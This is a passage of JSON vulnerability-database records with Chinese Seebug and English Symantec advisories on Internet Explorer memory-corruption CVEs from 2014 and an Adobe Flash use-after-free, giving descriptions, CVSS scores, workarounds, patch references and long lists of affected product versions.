\u6ca1\u6709\u6b63\u786e\u8bbf\u95ee\u5185\u5b58\u5bf9\u8c61\uff0c\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u540e\u53ef\u7834\u574f\u5185\u5b58\uff0c\u5728\u5f53\u524d\u7528\u6237\u6743\u9650\u4e0b\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nMicrosoft Internet Explorer 6-11\r\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n\r\n * \u8bbe\u7f6e\u4e92\u8054\u7f51\u548c\u5185\u8054\u7f51\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u4e3a\u201c\u9ad8\u201d\r\n * \u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u76f4\u63a5\u7981\u7528\u3002\r\n * \u5e94\u7528Microsoft Fix it\u89e3\u51b3\u65b9\u6848\uff0c"MSHTML Shim Workaround"\uff0c\u963b\u6b62\u5229\u7528CVE-2014-0322\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS14-012\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS14-012\uff1aCumulative Security Update for Internet Explorer (2925418)\r\n\u94fe\u63a5\uff1ahttp://technet.microsoft.com/security/bulletin/MS14-012", "published": "2014-03-12T00:00:00", "title": "Microsoft Internet Explorer\u5185\u5b58\u7834\u574f\u6f0f\u6d1e(CVE-2014-0299)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0299", "CVE-2014-0322"], "modified": "2014-03-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61753", "id": "SSV:61753", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:30:59", "description": "BUGTRAQ ID: 66027\r\nCVE(CAN) ID: CVE-2014-0302\r\n\r\nInternet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer \u6ca1\u6709\u6b63\u786e\u8bbf\u95ee\u5185\u5b58\u5bf9\u8c61\uff0c\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u540e\u53ef\u7834\u574f\u5185\u5b58\uff0c\u5728\u5f53\u524d\u7528\u6237\u6743\u9650\u4e0b\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nMicrosoft Internet Explorer 6-11\r\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n\r\n * \u8bbe\u7f6e\u4e92\u8054\u7f51\u548c\u5185\u8054\u7f51\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u4e3a\u201c\u9ad8\u201d\r\n * \u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u76f4\u63a5\u7981\u7528\u3002\r\n * \u5e94\u7528Microsoft Fix it\u89e3\u51b3\u65b9\u6848\uff0c"MSHTML Shim Workaround"\uff0c\u963b\u6b62\u5229\u7528CVE-2014-0322\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS14-012\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS14-012\uff1aCumulative Security Update for Internet Explorer (2925418)\r\n\u94fe\u63a5\uff1ahttp://technet.microsoft.com/security/bulletin/MS14-012", "published": "2014-03-12T00:00:00", "title": "Microsoft Internet Explorer\u5185\u5b58\u7834\u574f\u6f0f\u6d1e(CVE-2014-0302)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0302", "CVE-2014-0322"], "modified": "2014-03-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61755", "id": "SSV:61755", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:30:46", "description": "BUGTRAQ ID: 66023\r\nCVE(CAN) ID: CVE-2014-0297\r\n\r\nInternet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer \u6ca1\u6709\u6b63\u786e\u8bbf\u95ee\u5185\u5b58\u5bf9\u8c61\uff0c\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u540e\u53ef\u7834\u574f\u5185\u5b58\uff0c\u5728\u5f53\u524d\u7528\u6237\u6743\u9650\u4e0b\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nMicrosoft Internet Explorer 6-11\r\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n\r\n * \u8bbe\u7f6e\u4e92\u8054\u7f51\u548c\u5185\u8054\u7f51\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u4e3a\u201c\u9ad8\u201d\r\n * \u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u76f4\u63a5\u7981\u7528\u3002\r\n * \u5e94\u7528Microsoft Fix it\u89e3\u51b3\u65b9\u6848\uff0c"MSHTML Shim Workaround"\uff0c\u963b\u6b62\u5229\u7528CVE-2014-0322\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS14-012\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS14-012\uff1aCumulative Security Update for Internet Explorer (2925418)\r\n\u94fe\u63a5\uff1ahttp://technet.microsoft.com/security/bulletin/MS14-012", "published": "2014-03-12T00:00:00", "title": "Microsoft Internet Explorer\u5185\u5b58\u7834\u574f\u6f0f\u6d1e(CVE-2014-0297)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0297", "CVE-2014-0322"], "modified": "2014-03-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61751", "id": "SSV:61751", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:30:39", "description": "BUGTRAQ ID: 66025\r\nCVE(CAN) ID: CVE-2014-0298\r\n\r\nInternet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer \u6ca1\u6709\u6b63\u786e\u8bbf\u95ee\u5185\u5b58\u5bf9\u8c61\uff0c\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u540e\u53ef\u7834\u574f\u5185\u5b58\uff0c\u5728\u5f53\u524d\u7528\u6237\u6743\u9650\u4e0b\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nMicrosoft Internet Explorer 6-11\r\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n\r\n * \u8bbe\u7f6e\u4e92\u8054\u7f51\u548c\u5185\u8054\u7f51\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u4e3a\u201c\u9ad8\u201d\r\n * \u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u76f4\u63a5\u7981\u7528\u3002\r\n * \u5e94\u7528Microsoft Fix it\u89e3\u51b3\u65b9\u6848\uff0c"MSHTML Shim Workaround"\uff0c\u963b\u6b62\u5229\u7528CVE-2014-0322\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS14-012\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS14-012\uff1aCumulative Security Update for Internet Explorer (2925418)\r\n\u94fe\u63a5\uff1ahttp://technet.microsoft.com/security/bulletin/MS14-012", "published": "2014-03-12T00:00:00", "title": "Microsoft Internet Explorer\u5185\u5b58\u7834\u574f\u6f0f\u6d1e(CVE-2014-0298)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0298", "CVE-2014-0322"], "modified": "2014-03-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61754", "id": "SSV:61754", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "symantec": [{"lastseen": "2021-06-08T18:47:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-0322"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. Microsoft Internet Explorer 9 and 10 are affected.\n\n### Technologies Affected\n\n * Avaya Aura Conferencing 6.0 \n * Avaya Aura Conferencing 7.0 \n * Avaya CallPilot 4.0 \n * Avaya CallPilot 4.0.1 \n * Avaya CallPilot 5.0 \n * Avaya CallPilot 5.0.1 \n * Avaya Communication Server 1000 Telephony Manager 3.0 \n * Avaya Communication Server 1000 Telephony Manager 3.0.1 \n * Avaya Communication Server 1000 Telephony Manager 4.0 \n * Avaya Communication Server 1000 Telephony Manager 4.0.1 \n * Avaya Meeting Exchange - Client Registration Server 5.0 \n * Avaya Meeting Exchange - Client Registration Server 5.0.1 \n * Avaya Meeting Exchange - Client Registration Server 5.2 \n * Avaya Meeting Exchange - Client Registration Server 5.2.1 \n * Avaya Meeting Exchange - Client Registration Server 6.0 \n * Avaya Meeting Exchange - Client Registration Server 6.2 \n * Avaya Meeting Exchange - Recording Server 5.2.1 \n * Avaya Meeting Exchange - Recording Server 6.0 \n * Avaya Meeting Exchange - Recording Server 6.2 \n * Avaya Meeting Exchange - Streaming Server 5.0 \n * Avaya Meeting Exchange - Streaming Server 5.0 \n * Avaya Meeting Exchange - Streaming Server 5.0.1 \n * Avaya Meeting Exchange - Streaming Server 5.2 \n * Avaya Meeting Exchange - Streaming Server 5.2.1 \n * Avaya Meeting Exchange - Streaming Server 6.0 \n * Avaya Meeting Exchange - Streaming Server 6.2 \n * Avaya Meeting Exchange - Web Conferencing Server 5.0 \n * Avaya Meeting Exchange - Web Conferencing Server 5.0.1 \n * Avaya Meeting Exchange - Web Conferencing Server 5.2 \n * Avaya Meeting Exchange - Web Conferencing Server 5.2.1 \n * Avaya Meeting Exchange - Web Conferencing Server 6.0 \n * Avaya Meeting Exchange - Web Conferencing Server 6.2 \n * Avaya Meeting Exchange - Webportal 5.0 \n * Avaya Meeting Exchange - Webportal 5.0.1 \n * Avaya Meeting Exchange - Webportal 5.2 \n * Avaya Meeting Exchange - Webportal 5.2.1 \n * Avaya Meeting Exchange - Webportal 6.0 \n * Avaya Meeting Exchange - Webportal 6.2 \n * Avaya Messaging Application Server 5.0 \n * Avaya Messaging Application Server 5.0.1 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Application Server 5.2.1 \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2014-02-13T00:00:00", "id": "SMNTC-65551", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/65551", "published": "2014-02-13T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2014-0322 Use-After-Free Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:45:41", "bulletinFamily": "software", "cvelist": ["CVE-2015-5119", "CVE-2015-5122"], "description": "### Description\n\nAdobe Flash Player is prone to a remote memory-corruption vulnerability because of a use-after-free error. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition.\n\n### Technologies Affected\n\n * Adobe AIR 1.0 \n * Adobe AIR 1.0.1 \n * Adobe AIR 1.0.4990 \n * Adobe AIR 1.0.8.4990 \n * Adobe AIR 1.01 \n * Adobe AIR 1.1 \n * Adobe AIR 1.1.0.5790 \n * Adobe AIR 1.5 \n * Adobe AIR 1.5.0.7220 \n * Adobe AIR 1.5.1 \n * Adobe AIR 1.5.1.8210 \n * Adobe AIR 1.5.2 \n * Adobe AIR 1.5.3 \n * Adobe AIR 1.5.3.9120 \n * Adobe AIR 1.5.3.9130 \n * Adobe AIR 13.0.0.111 \n * Adobe AIR 13.0.0.83 \n * Adobe AIR 14.0.0.110 \n * Adobe AIR 14.0.0.137 \n * Adobe AIR 14.0.0.178 \n * Adobe AIR 14.0.0.179 \n * Adobe AIR 15.0.0.249 \n * Adobe AIR 15.0.0.252 \n * Adobe AIR 15.0.0.293 \n * Adobe AIR 15.0.0.356 \n * Adobe AIR 16.0.0.245 \n * Adobe AIR 16.0.0.272 \n * Adobe AIR 17.0.0.144 \n * Adobe AIR 17.0.0.172 \n * Adobe AIR 18.0.0.143 \n * Adobe AIR 18.0.0.144 \n * Adobe AIR 2.0.2 \n * Adobe AIR 2.0.2.12610 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3.13070 \n * Adobe AIR 2.0.4 \n * Adobe AIR 2.5.0.16600 \n * Adobe AIR 2.5.1 \n * Adobe AIR 2.5.1.17730 \n * Adobe AIR 2.6 \n * Adobe AIR 2.6.0.19120 \n * Adobe AIR 2.6.0.19140 \n * Adobe AIR 2.6.19120 \n * Adobe AIR 2.6.19140 \n * Adobe AIR 2.7 \n * Adobe AIR 2.7.0.1948 \n * Adobe AIR 2.7.0.19480 \n * Adobe AIR 2.7.0.1953 \n * Adobe AIR 2.7.0.19530 \n * Adobe AIR 2.7.1 \n * Adobe AIR 2.7.1.1961 \n * Adobe AIR 2.7.1.19610 \n * Adobe AIR 3.0 \n * Adobe AIR 3.0.0.408 \n * Adobe AIR 3.0.0.4080 \n * Adobe AIR 3.1.0.485 \n * Adobe AIR 3.1.0.488 \n * Adobe AIR 3.1.0.4880 \n * Adobe AIR 3.2.0.207 \n * Adobe AIR 3.2.0.2070 \n * Adobe AIR 3.2.0.2080 \n * Adobe AIR 3.3.0.3610 \n * Adobe AIR 3.3.0.3670 \n * Adobe AIR 3.3.0.3690 \n * Adobe AIR 3.4.0.2540 \n * Adobe AIR 3.4.0.2710 \n * Adobe AIR 3.5.0.1060 \n * Adobe AIR 3.5.0.600 \n * Adobe AIR 3.5.0.880 \n * Adobe AIR 3.5.0.890 \n * Adobe AIR 3.6.0.597 \n * Adobe AIR 3.6.0.599 \n * Adobe AIR 3.6.0.6090 \n * Adobe AIR 3.7.0.1530 \n * Adobe AIR 3.7.0.1530 \n * Adobe AIR 3.7.0.1660 \n * Adobe AIR 3.7.0.1660 \n * Adobe AIR 3.7.0.1860 \n * Adobe AIR 3.7.0.2090 \n * Adobe AIR 3.7.0.2100 \n * Adobe AIR 3.8.0.1430 \n * Adobe AIR 3.8.0.870 \n * Adobe AIR 3.8.0.910 \n * Adobe AIR 3.9.0.1060 \n * Adobe AIR 3.9.0.1210 \n * Adobe AIR 3.9.0.1380 \n * Adobe AIR 4 \n * Adobe AIR 4.0.0.1390 \n * Adobe AIR 4.0.0.1390 SDK \n * Adobe AIR 4.0.0.1628 \n * Adobe AIR SDK 13.0.0.111 \n * Adobe AIR SDK 13.0.0.83 \n * Adobe AIR SDK 14.0.0.110 \n * Adobe AIR SDK 14.0.0.137 \n * Adobe AIR SDK 14.0.0.178 \n * Adobe AIR SDK 14.0.0.179 \n * Adobe AIR SDK 15.0.0.249 \n * Adobe AIR SDK 15.0.0.302 \n * Adobe AIR SDK 15.0.0.356 \n * Adobe AIR SDK 16.0.0.272 \n * Adobe AIR SDK 17.0.0.144 \n * Adobe AIR SDK 17.0.0.172 \n * Adobe AIR SDK 18.0.0.143 \n * Adobe AIR SDK 18.0.0.144 \n * Adobe AIR SDK 3.9.0.1380 \n * Adobe AIR SDK 4.0.0.1390 \n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.411 \n * Adobe Flash Player 11.2.202.418 \n * Adobe Flash Player 11.2.202.424 \n * Adobe Flash Player 11.2.202.425 \n * Adobe Flash Player 11.2.202.429 \n * Adobe Flash Player 11.2.202.438 \n * Adobe Flash Player 11.2.202.440 \n * Adobe Flash Player 11.2.202.442 \n * Adobe Flash Player 11.2.202.451 \n * Adobe Flash Player 11.2.202.457 \n * Adobe Flash Player 11.2.202.460 \n * Adobe Flash Player 11.2.202.466 \n * Adobe Flash Player 11.2.202.468 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 \n * Adobe Flash Player 13.0.0.250 \n * Adobe Flash Player 13.0.0.252 \n * Adobe Flash Player 13.0.0.258 \n * Adobe Flash Player 13.0.0.259 \n * Adobe Flash Player 13.0.0.260 \n * Adobe Flash Player 13.0.0.262 \n * Adobe Flash Player 